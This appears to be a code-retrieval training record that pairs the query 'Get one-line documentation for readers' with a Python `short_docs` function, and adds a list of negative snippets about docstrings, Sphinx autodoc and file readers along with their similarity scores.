[ "0.6164184", "0.5904849", "0.58638656", "0.58638656", "0.5770025", "0.575396", "0.56898904", "0.5686118", "0.56144536", "0.56005126", "0.5580309", "0.5566034", "0.5542885", "0.55397743", "0.5537704", "0.55220896", "0.5509569", "0.54929805", "0.549026", "0.54900736", "0.54776174", "0.54772145", "0.5458027", "0.5456437", "0.5438363", "0.5438363", "0.5433666", "0.54315096", "0.54271394", "0.54217505", "0.5419295", "0.5412132", "0.54115313", "0.5401336", "0.540011", "0.53817284", "0.537891", "0.5348365", "0.53455675", "0.53445536", "0.53423405", "0.53145504", "0.530937", "0.53090644", "0.53039986", "0.52967757", "0.5291968", "0.5291525", "0.52891445", "0.5287744", "0.527682", "0.5276578", "0.527116", "0.52703166", "0.52698517", "0.52697486", "0.5269036", "0.52576154", "0.52506953", "0.524705", "0.5244999", "0.5241969", "0.52290744", "0.52137315", "0.5212476", "0.5198716", "0.5198127", "0.51966804", "0.5186386", "0.51829743", "0.5177783", "0.5170479", "0.51574844", "0.5149605", "0.51470673", "0.5142331", "0.51416296", "0.5139342", "0.5133798", "0.5130544", "0.51267874", "0.5122803", "0.51205087", "0.511588", "0.51146626", "0.51043415", "0.50985503", "0.50962424", "0.509383", "0.5089747", "0.5081151", "0.5080604", "0.5073594", "0.50723064", "0.50700486", "0.5065926", "0.5061504", "0.5056844", "0.5052842", "0.5051808" ]
0.66304976
0
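Comparing the two rows above suggests how document_score and document_rank relate to negative_scores: in the second row the document's score (0.66304976) exceeds every negative score and its rank is 0, while in the first row 78 of the 101 negatives outscore the document (0.47953343) and its rank is 78. A small sketch under that inferred (not documented) reading:

```python
# Sketch: recompute document_rank from the scores in a row.
# Assumption (inferred from the rows above, not stated by the dataset):
# rank = number of negatives whose score exceeds the document's own score.
def infer_document_rank(document_score: float, negative_scores: list[float]) -> int:
    return sum(score > document_score for score in negative_scores)

# Second row: 0.66304976 beats every negative score, giving rank 0.
# First row: 78 of the 101 negative scores exceed 0.47953343, giving rank 78.
```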
Get one-line documentation for readers. If no readers are specified, documentation for all available readers is returned.
def short_docs(*readers: str) -> List[Tuple[str, str]]:
    if not readers:
        readers = names()

    return [(r, plugins.doc(__name__, r, long_doc=False)) for r in readers]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_readers():\n return all_readers", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def get_docs(self):\n return self.retrieve_docstring()", "def read_documentation(self, fid):\r\n\r\n lin = self.read_line(fid)\r\n while lin[0] != ':':\r\n self.documentation.append(lin)\r\n lin = self.read_line(fid)\r\n return lin", "def get_docs_and_page():\n _, *args = sys.argv[:]\n if len(args) > 0:\n print(pydoc.getdoc(*args))\n return pydoc.getdoc(*args)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def get_reader_funcs():\n return READERS", "def get_documentation(self, *args, **dargs):\n pass", "def chain(*readers):\n\n def reader():\n rs = []\n for r in readers:\n rs.append(r())\n\n for e in itertools.chain(*rs):\n yield e\n\n return reader", "def doc(self):\n return \"\\n\".join(self.docLines)", "def docs():", "def docLines(self):\n summary, description = self._getDocParts()\n if description:\n return summary + [\"\"] + description\n return summary", "def summarize_rcdocs(modnames, headersep=\"=\", maxdflt=2000):\n nods = \"No docstring provided.\"\n template = \":{0!s}: {1!s}, *default:* {2}.\"\n docstrs = []\n tw = textwrap.TextWrapper(width=80, subsequent_indent=\" \"*4)\n for modname in modnames:\n moddoc = str(modname)\n moddoc += \"\\n\"+ headersep * len(moddoc) + \"\\n\"\n plugins = Plugins([modname], loaddeps=False) # get a lone plugin\n plugins.merge_rcs()\n rc = plugins.rc\n rcdocs = plugins.rcdocs\n for key in sorted(rc._dict.keys()):\n dflt = getattr(rc, key)\n rdflt = repr(dflt)\n rdflt = rdflt if len(rdflt) <= maxdflt else \"{0}.{1} instance\".format(\n dflt.__class__.__module__, dflt.__class__.__name__)\n rcdoc = template.format(key, rcdocs.get(key, nods), rdflt)\n moddoc += \"\\n\".join(tw.wrap(rcdoc)) + '\\n'\n docstrs.append(moddoc)\n return \"\\n\\n\\n\".join(docstrs)", "def get_documentation(path=\"\"):\n return \"\"\"<HTML><head><title>Python Minidoc for \"\"\"+path+\"\"\"</title></head>\n <body>\n \"\"\"+get_documentation_body(path)+\"\"\"\n </body></html>\"\"\"", "def get_documented(filenames):\r\n documented = {}\r\n for filename in filenames:\r\n f = open(filename, 'r')\r\n lines = f.read().splitlines()\r\n documented.update(get_documented_in_lines(lines, filename=filename))\r\n f.close()\r\n return documented", "def get_documented(filenames):\n documented = {}\n for filename in filenames:\n f = open(filename, 'r')\n lines = f.read().splitlines()\n documented.update(get_documented_in_lines(lines, filename=filename))\n f.close()\n return documented", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def getDoc(self):\r\n return self.__doc__", "def parse_docs(docs):\n if not docs:\n return __name__, \"<no documentation>\"\n docs = docs.strip().split('\\n')\n for i, line in enumerate(docs):\n docs[i] = line.strip()\n return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else \"<no documentation>\"", "def get_doc(cls_or_func):\n try:\n return cls_or_func.__doc__.split(\"\\n\")[0].strip()\n except (AttributeError, IndexError):\n return None", "def with_docs(self):\r\n self._configurations.append('javadoc')\r\n return self", "def get_documented_in_docstring(name, module=None, filename=None):\r\n try:\r\n obj, real_name = import_by_name(name)\r\n lines = pydoc.getdoc(obj).splitlines()\r\n return get_documented_in_lines(lines, module=name, filename=filename)\r\n except AttributeError:\r\n pass\r\n except ImportError, 
e:\r\n print \"Failed to import '%s': %s\" % (name, e)\r\n return {}", "def doc(self):\n doc = self.get('doc')\n if doc:\n from .config import defaults\n return defaults.types.doc(doc)", "def documentation_only():\n pass", "def get(self, *args):\n return self.docs.get(*args)", "def get_documented_in_docstring(name, module=None, filename=None):\n try:\n obj, real_name = import_by_name(name)\n lines = pydoc.getdoc(obj).splitlines()\n return get_documented_in_lines(lines, module=name, filename=filename)\n except AttributeError:\n pass\n except ImportError, e:\n print \"Failed to import '%s': %s\" % (name, e)\n return {}", "def documentation(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"documentation\")", "def documentation():\n return auto.html()", "def hotkeys_readme():\n\n root = '/'.join(__file__.split('/')[:-4])\n fname = root + '/README.rst'\n with codecs.open(fname, 'r', 'utf-8') as f:\n rst = f.read()\n hotkeys = rst.split('.. hotkeys')[1]\n return docutils.examples.html_body(hotkeys)", "def main(rc):\n with store_client(rc) as sclient:\n for doc in rc.documents:\n sclient.copydoc(doc)", "def _get_doc(self, name):\r\n if name == 'keyboard':\r\n return 'Built-in Function: keyboard ()'\r\n exist = self._eval('exist {0}'.format(name), log=False, verbose=False)\r\n if exist.strip() == 'ans = 0':\r\n msg = 'Name: \"%s\" does not exist on the Octave session path'\r\n raise Oct2PyError(msg % name)\r\n doc = 'No documentation for %s' % name\r\n try:\r\n doc = self._eval('help {0}'.format(name), log=False, verbose=False)\r\n except Oct2PyError as e:\r\n if 'syntax error' in str(e):\r\n raise(e)\r\n try:\r\n doc = self._eval('type {0}'.format(name), log=False,\r\n verbose=False)\r\n doc = '\\n'.join(doc.splitlines()[:3])\r\n except Oct2PyError as e:\r\n pass\r\n return doc", "def get_commands_and_docstrings(self):\r\n for command, function in self._commands.items():\r\n if command is not None:\r\n yield command, function.__doc__", "def get_readme():\n for name in ('README', 'README.rst', 'README.md'):\n if os.path.exists(name):\n return read_file(name)\n return ''", "def readme(self, ref=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/readme'.format(self.parent.get_url())\r\n\r\n return http.Request('GET', url, params), parsers.parse_json", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def get_documented_in_lines(lines, module=None, filename=None):\r\n title_underline_re = re.compile(\"^[-=*_^#]{3,}\\s*$\")\r\n autodoc_re = re.compile(\".. 
auto(function|method|attribute|class \\\r\n |exception|module)::\\s*([A-Za-z0-9_.]+)\\s*$\")\r\n autosummary_re = re.compile(r'^\\.\\.\\s+autosummary::\\s*')\r\n module_re = re.compile(\r\n r'^\\.\\.\\s+(current)?module::\\s*([a-zA-Z0-9_.]+)\\s*$')\r\n autosummary_item_re = re.compile(r'^\\s+([_a-zA-Z][a-zA-Z0-9_.]*)\\s*')\r\n toctree_arg_re = re.compile(r'^\\s+:toctree:\\s*(.*?)\\s*$')\r\n\r\n documented = {}\r\n\r\n current_title = []\r\n last_line = None\r\n toctree = None\r\n current_module = module\r\n in_autosummary = False\r\n\r\n for line in lines:\r\n try:\r\n if in_autosummary:\r\n m = toctree_arg_re.match(line)\r\n if m:\r\n toctree = m.group(1)\r\n continue\r\n\r\n if line.strip().startswith(':'):\r\n continue # skip options\r\n\r\n m = autosummary_item_re.match(line)\r\n if m:\r\n name = m.group(1).strip()\r\n if current_module and not name.startswith(\r\n current_module + '.'):\r\n name = \"%s.%s\" % (current_module, name)\r\n\r\n documented.setdefault(name, []).append(\r\n (filename, current_title, 'autosummary', toctree))\r\n continue\r\n if line.strip() == '':\r\n continue\r\n in_autosummary = False\r\n\r\n m = autosummary_re.match(line)\r\n if m:\r\n in_autosummary = True\r\n continue\r\n\r\n m = autodoc_re.search(line)\r\n if m:\r\n name = m.group(2).strip()\r\n if m.group(1) == \"module\":\r\n current_module = name\r\n documented.update(get_documented_in_docstring(\r\n name, filename=filename))\r\n elif current_module and not name.startswith(\r\n current_module + '.'):\r\n name = \"%s.%s\" % (current_module, name)\r\n\r\n documented.setdefault(name, []).append(\r\n (filename, current_title, \"auto\" + m.group(1), None))\r\n continue\r\n\r\n m = title_underline_re.match(line)\r\n if m and last_line:\r\n current_title = last_line.strip()\r\n continue\r\n\r\n m = module_re.match(line)\r\n if m:\r\n current_module = m.group(2)\r\n continue\r\n finally:\r\n last_line = line\r\n\r\n return documented", "def _generate_autodoc(\n self, entry: _MemberDocumenterEntry,\n summary=False) -> Tuple[sphinx.addnodes.desc, Optional[str]]:\n\n rst_strings = docutils.statemachine.StringList()\n entry.documenter.directive.result = rst_strings\n\n if entry.overload and entry.overload.overload_id is not None:\n # Force autodoc to use the overload-specific signature. 
autodoc already\n # has an internal mechanism for overriding the docstrings based on the\n # `_new_docstrings` member.\n entry.documenter._new_docstrings = [ # pylint: disable=protected-access\n sphinx.util.docstrings.prepare_docstring(\n entry.overload.doc or '',\n tabsize=self.state.document.settings.tab_width)\n ]\n # Workaround for https://github.com/sphinx-doc/sphinx/pull/9518\n orig_get_doc = entry.documenter.get_doc\n\n def get_doc(ignore: Optional[int] = None) -> List[List[str]]:\n if entry.documenter._new_docstrings is not None: # pylint: disable=protected-access\n return entry.documenter._new_docstrings # pylint: disable=protected-access\n return orig_get_doc(ignore) # type: ignore\n\n entry.documenter.get_doc = get_doc\n\n else:\n # Force autodoc to obtain the docstring through its normal mechanism,\n # which includes the \"ModuleAnalyzer\" for reading docstrings of\n # variables/attributes that are only contained in the source code.\n entry.documenter._new_docstrings = None # pylint: disable=protected-access\n orig_get_doc = None\n\n if summary and entry.is_inherited:\n overridename = entry.name\n else:\n overridename = _get_python_object_name_for_signature(entry)\n entry.documenter.format_name = lambda: overridename\n\n # Record the documenter for use by _process_docstring in `autodoc.py`.\n current_documenter_map = self.env.temp_data.setdefault(\n 'tensorstore_autodoc_current_documenter', {})\n current_documenter_map[entry.documenter.fullname] = entry.documenter\n entry.documenter.generate()\n if orig_get_doc is not None:\n del entry.documenter.get_doc\n del current_documenter_map[entry.documenter.fullname]\n\n group_name = _postprocess_autodoc_rst_output(rst_strings, summary=summary)\n\n entry.documenter.titles_allowed = True\n nodes = [\n x for x in sphinx.ext.autodoc.directive.parse_generated_content(\n self.state, entry.documenter.directive.result, entry.documenter)\n if isinstance(x, sphinx.addnodes.desc)\n ]\n assert len(nodes) == 1\n node = nodes[0]\n\n if entry.subscript:\n _mark_subscript_parameterlist(node)\n if entry.full_name.endswith(_INIT_SUFFIX):\n _clean_init_signature(node)\n if entry.full_name.endswith(_CLASS_GETITEM_SUFFIX):\n _clean_class_getitem_signature(node)\n\n return node, group_name", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def get(self, writer_id, **kwargs):\n writer = get_writer(writer_id)\n if not writer:\n api.abort(404)\n else:\n return writer", "def getdoc(object):\r\n try:\r\n doc = object.__doc__\r\n except AttributeError:\r\n return None\r\n if not isinstance(doc, types.StringTypes):\r\n return None\r\n return cleandoc(doc)", "def documentation(self):\n return self.handle.__doc__", "def getdoc():\n\n\timport webnotes\n\tfrom webnotes.utils import cint\n\t\n\tform = webnotes.form_dict\n\tdoctype, docname = form.get('doctype'), form.get('name')\n\tprefix = cint(form.get('from_archive')) and 'arc' or 'tab'\n\n\tif not (doctype and docname):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tdoclist = []\n\t# single\n\tdoclist = load_single_doc(doctype, docname, (form.get('user') or webnotes.session['user']), prefix)\n\t\n\t# load doctype along with the doc\n\tif form.get('getdoctype'):\n\t\timport webnotes.model.doctype\n\t\tdoclist += webnotes.model.doctype.get(doctype)\n\n\t# tag as archived\n\tif prefix == 'arc':\n\t\tdoclist[0].__archived=1\n\n\twebnotes.response['docs'] = doclist", "def 
get_documented_in_lines(lines, module=None, filename=None):\n title_underline_re = re.compile(\"^[-=*_^#]{3,}\\s*$\")\n autodoc_re = re.compile(\".. auto(function|method|attribute|class|exception|module)::\\s*([A-Za-z0-9_.]+)\\s*$\")\n autosummary_re = re.compile(r'^\\.\\.\\s+autosummary::\\s*')\n module_re = re.compile(r'^\\.\\.\\s+(current)?module::\\s*([a-zA-Z0-9_.]+)\\s*$')\n autosummary_item_re = re.compile(r'^\\s+([_a-zA-Z][a-zA-Z0-9_.]*)\\s*.*?')\n toctree_arg_re = re.compile(r'^\\s+:toctree:\\s*(.*?)\\s*$')\n \n documented = {}\n \n current_title = []\n last_line = None\n toctree = None\n current_module = module\n in_autosummary = False\n \n for line in lines:\n try:\n if in_autosummary:\n m = toctree_arg_re.match(line)\n if m:\n toctree = m.group(1)\n continue\n\n if line.strip().startswith(':'):\n continue # skip options\n\n m = autosummary_item_re.match(line)\n if m:\n name = m.group(1).strip()\n if current_module and not name.startswith(current_module + '.'):\n name = \"%s.%s\" % (current_module, name)\n documented.setdefault(name, []).append(\n (filename, current_title, 'autosummary', toctree))\n continue\n if line.strip() == '':\n continue\n in_autosummary = False\n\n m = autosummary_re.match(line)\n if m:\n in_autosummary = True\n continue\n\n m = autodoc_re.search(line)\n if m:\n name = m.group(2).strip()\n if m.group(1) == \"module\":\n current_module = name\n documented.update(get_documented_in_docstring(\n name, filename=filename))\n elif current_module and not name.startswith(current_module+'.'):\n name = \"%s.%s\" % (current_module, name)\n documented.setdefault(name, []).append(\n (filename, current_title, \"auto\" + m.group(1), None))\n continue\n\n m = title_underline_re.match(line)\n if m and last_line:\n current_title = last_line.strip()\n continue\n\n m = module_re.match(line)\n if m:\n current_module = m.group(2)\n continue\n finally:\n last_line = line\n\n return documented", "def get_readme():\n for name in ('README', 'README.txt', 'README.rst', 'README.md'):\n if os.path.exists(name):\n return read_file(name)\n return ''", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def get_maintainers(path, sections, level=0):\n maintainers = []\n lists = []\n for section in sections:\n tmp_maint, tmp_lists = get_section_maintainers(path, section)\n if tmp_maint:\n maintainers += tmp_maint\n if tmp_lists:\n lists += tmp_lists\n\n if not maintainers:\n # If no match found, look for match for (nonexistent) file\n # REPO.working_dir/<default>\n print('\"%s\": no maintainers found, looking for default' % path)\n if level == 0:\n maintainers = get_maintainers('<default>', sections, level=level + 1)\n else:\n print(\"No <default> maintainers set for project.\")\n if not maintainers:\n return None\n\n return maintainers + lists", "def getdoc(doctype, name, user=None):\n\n\timport webnotes\n\t\n\tif not (doctype and name):\n\t\traise Exception, 'doctype and name required!'\n\t\n\tif not name: \n\t\tname = doctype\n\n\tif not webnotes.conn.exists(doctype, name):\n\t\treturn []\n\n\ttry:\n\t\tbean = webnotes.bean(doctype, name)\n\t\tbean.run_method(\"onload\")\n\n\t\tdoclist = bean.doclist\n\n\t\t# add file list\n\t\tset_docinfo(doctype, name)\n\t\t\n\texcept Exception, e:\n\t\twebnotes.errprint(webnotes.utils.getTraceback())\n\t\twebnotes.msgprint('Did not load.')\n\t\traise e\n\n\tif bean and not name.startswith('_'):\n\t\twebnotes.user.update_recent(doctype, 
name)\n\t\n\twebnotes.response['docs'] = doclist", "def readerForDoc(cur, URL, encoding, options):\n ret = libxml2mod.xmlReaderForDoc(cur, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForDoc() failed')\n return xmlTextReader(_obj=ret)", "def reviewers(self) -> Optional[Sequence['outputs.AccessReviewReviewerResponse']]:\n return pulumi.get(self, \"reviewers\")", "def get_docstring(line_number, lines):\n docstring = None\n\n for index in reversed(range(line_number-1)):\n line = lines[index].strip()\n if len(line) == 0 or line.startswith(\"//\"):\n # Do not look for docstring when more than two blank lines precede\n # the element.\n if index < line_number - 1:\n return\n\n continue\n\n # Start of the docstring (from the end)\n if docstring is None:\n # If the entire docstring fit in one line\n match = re.search(\"(?<=/\\*\\* ).*(?= \\*/)\", line)\n if match is not None:\n return match.group()\n\n # No docstring\n if not line.startswith(\"*/\"):\n return\n\n docstring = []\n\n # Valid docstring line starts with a '*'\n elif re.search(\"^\\*( *| +.+)$\", line) is not None:\n indentation = 2 if len(line) > 1 else 1\n docstring.append(line[indentation:].rstrip())\n\n # Beginning of valid docstrings starts with '/**'\n elif line.startswith(\"/**\"):\n return \"\\n\".join(docstring[::-1])\n\n # Error in the docstring\n else:\n return", "def print_doc1(*args, **kwargs):\n # output settings from kwargs or take defaults\n color = kwargs.get('color', blue)\n bold = kwargs.get('bold', False)\n prefix = kwargs.get('prefix', '')\n tail = kwargs.get('tail', '\\n')\n\n def real_decorator(func):\n '''real decorator function'''\n @wraps(func)\n def wrapper(*args, **kwargs):\n '''the wrapper function'''\n try:\n prgf = first_paragraph(func.__doc__)\n print(color(prefix + prgf + tail, bold))\n except AttributeError as exc:\n name = func.__name__\n print(red(flo('{name}() has no docstring')))\n raise(exc)\n return func(*args, **kwargs)\n return wrapper\n\n invoked = bool(not args or kwargs)\n if not invoked:\n # invoke decorator function which returns the wrapper function\n return real_decorator(func=args[0])\n\n return real_decorator", "def print_doc1(*args, **kwargs):\n # output settings from kwargs or take defaults\n color = kwargs.get('color', blue)\n bold = kwargs.get('bold', False)\n prefix = kwargs.get('prefix', '')\n tail = kwargs.get('tail', '\\n')\n\n def real_decorator(func):\n '''real decorator function'''\n @wraps(func)\n def wrapper(*args, **kwargs):\n '''the wrapper function'''\n try:\n prgf = first_paragraph(func.__doc__)\n print(color(prefix + prgf + tail, bold))\n except AttributeError as exc:\n name = func.__name__\n print(red(flo('{name}() has no docstring')))\n raise(exc)\n return func(*args, **kwargs)\n return wrapper\n\n invoked = bool(not args or kwargs)\n if not invoked:\n # invoke decorator function which returns the wrapper function\n return real_decorator(func=args[0])\n\n return real_decorator", "def get_reader(self) -> SpectrumReader:\n # Get the reader class\n reader_class = self.get_reader_class()\n\n # Get the common options between ourselves and the reader class\n common_options = self.get_common_options(reader_class)\n\n # Get the options sub-list corresponding to those options\n common_option_sub_list = self.get_options_sub_list(common_options)\n\n return reader_class(common_option_sub_list)", "def docstring(func):\n try:\n lines = func.__doc__.strip().split(\"\\n\")\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def 
get_doc(self) -> Documentation:\n r : Documentation = [self.get_doc_string()]\n r_src = \"\"\n if hasattr(self,\"_path\"): r_src += \"locally at '%s'\" % (str(self._path))\n if self.url is not None: r_src += \" remote url(orig) '%s'\" % (self.url)\n r_src += \" remote url(parsed) '%s'\" % (self.git_url.as_string())\n if self.branch is not None: r_src += \" branch '%s'\" % (self.branch)\n r.append(r_src)\n r_stages = []\n for (sn,s) in self.stages.items():\n r_stages.append(sn)\n pass\n r_stages.sort()\n if len(r_stages)>0:\n r.append(\"Stages: %s\"%(\" \".join(r_stages)))\n pass\n return r", "def docs(self, searcher, exclude_docs=None):\r\n\r\n try:\r\n return self.matcher(searcher, exclude_docs=exclude_docs).all_ids()\r\n except TermNotFound:\r\n return []", "def documentation(self) -> str:\n return pulumi.get(self, \"documentation\")", "def readerWalker(self):\n ret = libxml2mod.xmlReaderWalker(self._o)\n if ret is None:raise treeError('xmlReaderWalker() failed')\n __tmp = xmlTextReader(_obj=ret)\n return __tmp", "def GetDocManager(self):\r\n return self._docManager", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def _get_bids_readme(self):\n readme = []\n # Grab all readme files, loop through\n for README_fname in [\n file for file in Path(self.dataset.path).glob(\"[Rr][Ee][Aa][Dd][Mm][Ee]*\")\n ]:\n # datalad get content if annexed\n self.dataset.get(README_fname)\n # read text from file\n try:\n file_text = ensure_unicode(README_fname.read_text()).strip()\n except:\n file_text = \"\"\n # Append dict with file text + extension to list\n readme.append({\"extension\": README_fname.suffix, \"text\": file_text})\n return readme if readme else None", "def get_doc(self):\n return self._doc", "def _get_docstring_and_short_description(self) -> Tuple[str, str]:\n\n if self.__doc__ is not None:\n docstring = self.__doc__\n short_description = next(line for line in self.__doc__.split(\"\\n\") if line)\n else:\n docstring = \"\"\n short_description = \"\"\n\n return docstring, short_description", "def reader(self):\n\n return self._reader", "async def setReaders(self, eventID: str, readers: Iterable[str]) -> None:", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def convert_doxygen_docstring(lines, name):\n\n lines = lines[:]\n newlines = []\n indent = 0\n reading_desc = False\n\n while lines:\n line = lines.pop(0)\n if line.startswith(\"////\"):\n continue\n\n line = line.rstrip()\n if line.startswith('///<'):\n strline = line[4:]\n else:\n strline = line\n\n strline = strline.lstrip('/ \\t')\n\n if strline == \"**\" or strline == 
\"*/\":\n continue\n\n if strline.startswith(\"** \"):\n strline = strline[3:]\n elif strline.startswith(\"* \"):\n strline = strline[2:]\n elif strline == \"*\":\n strline = \"\"\n\n strline = strline.lstrip(' \\t')\n\n if strline.startswith('@'):\n special = strline.split(' ', 1)[0][1:]\n if special == 'par' and strline.endswith(':') and lines and '@code' in lines[0]:\n newlines.append(' '*indent + strline[5:] + ':')\n newlines.append('')\n line = lines.pop(0)\n offset = line.index('@code')\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"verbatim\" or special == \"code\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. code-block:: guess')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"f[\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. math::')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@f]' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == 'param':\n #TODO\n #if extra is not None:\n # _, name, desc = strline.split(' ', 2)\n # extra['param:' + name] = desc\n continue\n elif special == 'deprecated':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n\n # I'd love to use the proper Sphinx deprecated tag, but it\n # requires a version number, whereas Doxygen doesn't.\n newlines.append('*Deprecated:* ' + convert_doxygen_format(value, name))\n newlines.append('')\n continue\n elif special in ('brief', 'return', 'returns'):\n #TODO\n #if extra is not None:\n # _, value = strline.split(' ', 1)\n # extra[special] = value\n continue\n elif special == 'details':\n strline = strline[9:]\n elif special == 'sa' or special == 'see':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n values = value.split(',')\n\n for i, value in enumerate(values):\n result = resolve_reference(value.partition('(')[0], name)\n if result:\n values[i] = ':{0}:`{1}`'.format(*result)\n else:\n values[i] = ':obj:`{0}`'.format(value)\n\n if special == 'see':\n newlines.append('See {}.'.format(', '.join(values)))\n else:\n newlines.append('See also {}.'.format(', '.join(values)))\n newlines.append('')\n continue\n elif special in ('note', 'warning'):\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. %s:: ' % (special))\n newlines.append('')\n newlines.append(' ' + convert_doxygen_format(strline[2 + len(special):], name))\n while lines and lines[0].strip(' *\\t/'):\n line = lines.pop(0).lstrip(' *\\t')\n newlines.append(' ' + convert_doxygen_format(line, name))\n\n newlines.append('')\n continue\n elif special == 'since':\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. 
versionadded:: ' + strline[7:])\n newlines.append('')\n continue\n else:\n print(\"Unhandled documentation tag: @\" + special)\n\n if strline or len(newlines) > 0:\n newlines.append(' '*indent + convert_doxygen_format(strline, name))\n\n return newlines", "def get_lyrics_writer(self) -> Optional[str]:\n return self.lyrics_writer", "def test_reader(qn_filepath, answers_dirpath):\n qns = get_questions(qn_filepath)\n for qn in qns:\n if qn.qid == 100:\n q = qn\n break\n assert q\n docs = get_documents(answers_dirpath, q.qid)\n print docs\n print docs[0].content", "def rawDoc(self):\n return self.namespace[\"__doc__\"]", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def get_docs(self):\n return get_view_description(self.callback)", "def get_fsleyes_readme():\n with open(op.join(basedir, 'README.rst'), 'rt', encoding='utf-8') as f:\n return f.read().strip()", "def doc(self) -> dict[str, tuple]:\n # TODO: create a new, better, doc interface to remove it\n plugin_commands = itertools.chain(\n self._rules_manager.get_all_commands(),\n self._rules_manager.get_all_nick_commands(),\n )\n commands = (\n (command, command.get_doc(), command.get_usages())\n for plugin_name, commands in plugin_commands\n for command in commands.values()\n )\n\n return dict(\n (name, (doc.splitlines(), [u['text'] for u in usages]))\n for command, doc, usages in commands\n for name in ((command.name,) + command.aliases)\n )", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def dam_snli_reader(resources_or_conf: Union[dict, SharedResources] = None):\n from jack.readers.multiple_choice.shared import MultipleChoiceSingleSupportInputModule\n from jack.readers.natural_language_inference.decomposable_attention import DecomposableAttentionModel\n from jack.readers.multiple_choice.shared import SimpleMCOutputModule\n shared_resources = create_shared_resources(resources_or_conf)\n\n input_module = MultipleChoiceSingleSupportInputModule(shared_resources)\n model_module = DecomposableAttentionModel(shared_resources)\n output_module = SimpleMCOutputModule(shared_resources)\n return TFReader(shared_resources, input_module, model_module, output_module)", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def show_documentation(self):\n self.docs = documentation.Documentation()", "def get_contributor(username):\n\n return utils.fetch('contributor/%s' % username)", "def DocString():\n return", "def _get_doc(self, name):\r\n doc = \"No documentation for %s\" % name\r\n\r\n engine = self._engine\r\n if not engine:\r\n msg = \"Session is not open\"\r\n raise Oct2PyError(msg)\r\n doc = engine.eval('help(\"%s\")' % name, silent=True)\r\n\r\n if \"syntax error:\" in doc.lower():\r\n raise Oct2PyError(doc)\r\n\r\n if \"error:\" in doc.lower():\r\n doc = engine.eval('type(\"%s\")' % name, silent=True)\r\n doc = \"\\n\".join(doc.splitlines()[:3])\r\n\r\n default = self.feval.__doc__\r\n default = \" \" + default[default.find(\"func_args:\") :] # type:ignore\r\n default = \"\\n\".join([line[8:] for line in default.splitlines()])\r\n\r\n doc = 
\"\\n\".join(doc.splitlines())\r\n doc = \"\\n\" + doc + \"\\n\\nParameters\\n----------\\n\" + default\r\n doc += \"\\n**kwargs - Deprecated keyword arguments\\n\\n\"\r\n doc += \"Notes\\n-----\\n\"\r\n doc += \"Keyword arguments to dynamic functions are deprecated.\\n\"\r\n doc += \"The `plot_*` kwargs will be ignored, but the rest will\\n\"\r\n doc += \"used as key - value pairs as in version 3.x.\\n\"\r\n doc += \"Use `set_plot_settings()` for plot settings, and use\\n\"\r\n doc += \"`func_args` directly for key - value pairs.\"\r\n return doc", "def dsldocs_completers(self, event):\n # print(dir(event), event)\n command = \"%dsldocs\"\n if event.line.startswith(command):\n doc = Document(event.line.replace(command, \".docs\"))\n c = CleverCompleter()\n res = c.get_completions(doc, None)\n # print(res)\n return [x.text for x in res]", "def generator(\n *, documentation: typing.Union[generators.DocumentationStyle, str, None] = None\n) -> generators.CodeGenerator:\n return generators.CodeGenerator(\n documentation=_convert_to_enumerator(\n 